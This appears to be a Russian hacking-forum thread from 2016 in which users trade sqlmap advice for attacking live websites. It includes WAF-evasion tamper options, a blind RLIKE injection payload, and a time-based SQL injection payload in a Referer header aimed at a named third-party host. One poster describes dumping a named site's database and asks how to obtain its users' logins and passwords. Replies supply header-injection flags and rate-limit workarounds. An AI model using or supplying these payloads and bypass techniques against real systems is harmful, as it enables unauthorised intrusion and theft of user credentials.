
18.11.2016, 16:25
|
|
Новичок
Регистрация: 31.01.2010
Сообщений: 18
С нами:
8566628
Репутация:
0
|
|
на сервере стоит Hiawatha Webserver. Как обойти его WaF в мапе, какие тамперы можно задействовать?
касается этой уязвимости http://www.securityfocus.com/bid/92687/info
крутит только MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause но таблицы выдернуть не может
|
|
|

19.11.2016, 18:05
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от 3acuson
↑
на сервере стоит Hiawatha Webserver. Как обойти его WaF в мапе, какие тамперы можно задействовать?
касается этой уязвимости
http://www.securityfocus.com/bid/92687/info
крутит только MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause но таблицы выдернуть не может
надо узнать почему не может, доступ к information_schema есть? дебаг запросов юзал?
|
|
|

19.11.2016, 20:45
|
|
Новичок
Регистрация: 31.01.2010
Сообщений: 18
С нами:
8566628
Репутация:
0
|
|
дебаг пишет [DEBUG] got HTTP error code: 441 (SQL Injection Detected) почти на все.
пропускает запросы типа 1 RLIKE (SELECT (CASE WHEN (9434=9434) THEN 1 ELSE 0x28 END))
возвращает ноль при запросе к счема.таблес
|
|
|

19.11.2016, 21:17
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от 3acuson
↑
дебаг пишет [DEBUG] got HTTP error code: 441 (SQL Injection Detected) почти на все.
пропускает запросы типа 1 RLIKE (SELECT (CASE WHEN (9434=9434) THEN 1 ELSE 0x28 END))
возвращает ноль при запросе к счема.таблес
да похоже на waf, "441 (SQL Injection Detected) почти на все" почти на всё, но получается не на всё, возможно слово from его смущает, попробуй запрос отправить что то типа "select 1 from 1"
к information_schema вероятно поэтому же доступа нет
|
|
|

22.11.2016, 19:37
|
|
Новичок
Регистрация: 22.11.2016
Сообщений: 1
С нами:
4986326
Репутация:
0
|
|
Подскажите пожалуйста как узать команду --os-bof?
Я все делаю с телефона. Скачал себе metasploit framework через терминал GNURoot Debian как требовал sqlmap, но при выполнении запроса с командой --os-bof он все-равно требует наличие метасплоита. Как решить эту проблему? Или может надо сплоит закинуть в папку какую то?
И еще вопрос можно ли как то получить логины и пароли к ЛК на этом сайте samp-gf.ru?
Сдампил БД через эту узвимость http://samp-gf.ru/download.php?id=3' , но ничего толкового не нашел в таблицах.
И вот на этом сайте samp-rp.ru можно что нибудь сделать, я вроде ничего похожего на соль не нашел.
|
|
|

23.11.2016, 17:45
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами:
6868406
Репутация:
2
|
|
привет
как вот такое крутить в sqlmap
Request
GET /authenticate.php HTTP/1.1
Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Requested-With: XMLHttpRequest
Host: wwwl.accuweather.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
HTTP/1.1 302 Found
Date: Wed, 23 Nov 2016 12:55:50 GMT
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Location: error.php?url=&mt=
Content-Length: 43
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
|
|
|

23.11.2016, 17:50
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от RWD
↑
привет
как вот такое крутить в sqlmap
Request
GET /authenticate.php HTTP/1.1
Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Requested-With: XMLHttpRequest
Host: wwwl.accuweather.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
HTTP/1.1 302 Found
Date: Wed, 23 Nov 2016 12:55:50 GMT
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Location: error.php?url=&mt=
Content-Length: 43
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
cкулмап -у site/authenticate.php --хедер'реферер*'
|
|
|

23.11.2016, 19:26
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами:
5795606
Репутация:
57
|
|
.SpoilerTarget" type="button">Spoiler: Список_параметров_для_фазз нга
--level=2 // фазит Cookie header
--level=3 // фазит User-Agent header, и Refererзаголовки
--level=5 // фазит Host header
Ну а в твоем случае,так как написали Выше
Используй астерикс (*)
--user-agent="sqlmap*" // тест иньекции в user-agent
--referer="target.com*" //тест иньекци в referer
--headers="User-Agent:test*\nReferer:bla" // Тоже самое что и --referer="blas" --user-agent="pipiska*"
--headers="MegaHeader= BigPipiska*" // Поиск скули в заголовке MegaHeader
Или же просто поставь астерикс(*) в нужном месте для иньекции в твоем request.txt
-r request.txt
|
|
|

25.11.2016, 03:08
|
|
Познающий
Регистрация: 23.12.2010
Сообщений: 78
С нами:
8098166
Репутация:
5
|
|
Подскажите почему так происходит и как это можно обойти.
Начал раскручивать /page.aspx?id=1
Вот так выглядел запрос:
Код:
--random-agent --time-sec 20
Ответ "connection timed out", даже если добавить --hpp
Затем попробовал добавить tamper:
Код:
--hpp --tamper=charunicodeencode,percentage,chardoubleencode --random-agent --time-sec 20
В итоге "500 internal server error":
.SpoilerTarget" type="button">Spoiler: Image with --tamper
Затем, после десяток попыток и экспериментов с разными запросами, оно всё же получило свой payload и отобразило --current-db. При чем без прописывания --tamper или --hpp. Вот что показал --banner.
.SpoilerTarget" type="button">Spoiler: Image --banner
Но вся проблема теперь состоит в том, что не хочет отображать таблицы.
.SpoilerTarget" type="button">Spoiler: Image --tables

Количество таблиц определяет, но имена не хочет. Вот как реагирует если добавить --hpp --parse-errors:
.SpoilerTarget" type="button">Spoiler: Image --hpp --parse-errors

Та же проблема если использовать --common-tables:
.SpoilerTarget" type="button">Spoiler: Image --common-tables
Как такое можно обойти?
|
|
|

25.11.2016, 13:59
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от passwd
↑
Подскажите почему так происходит и как это можно обойти.
Начал раскручивать /page.aspx?id=1
Вот так выглядел запрос:
Код:
--random-agent --time-sec 20
Ответ "connection timed out", даже если добавить --hpp

Затем попробовал добавить tamper:
Код:
--hpp --tamper=charunicodeencode,percentage,chardoubleencode --random-agent --time-sec 20
В итоге "500 internal server error":
Spoiler: Image with --tamper

Затем, после десяток попыток и экспериментов с разными запросами, оно всё же получило свой payload и отобразило --current-db. При чем без прописывания --tamper или --hpp. Вот что показал --banner.
Spoiler: Image --banner

Но вся проблема теперь состоит в том, что не хочет отображать таблицы.
Spoiler: Image --tables

Количество таблиц определяет, но имена не хочет. Вот как реагирует если добавить --hpp --parse-errors:
Spoiler: Image --hpp --parse-errors

Та же проблема если использовать --common-tables:
Spoiler: Image --common-tables

Как такое можно обойти?
если оно само заработало, может на сервере ограничение запросов в минуту например?
попробуй --delay=2 выставить, ну попытка не пытка
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|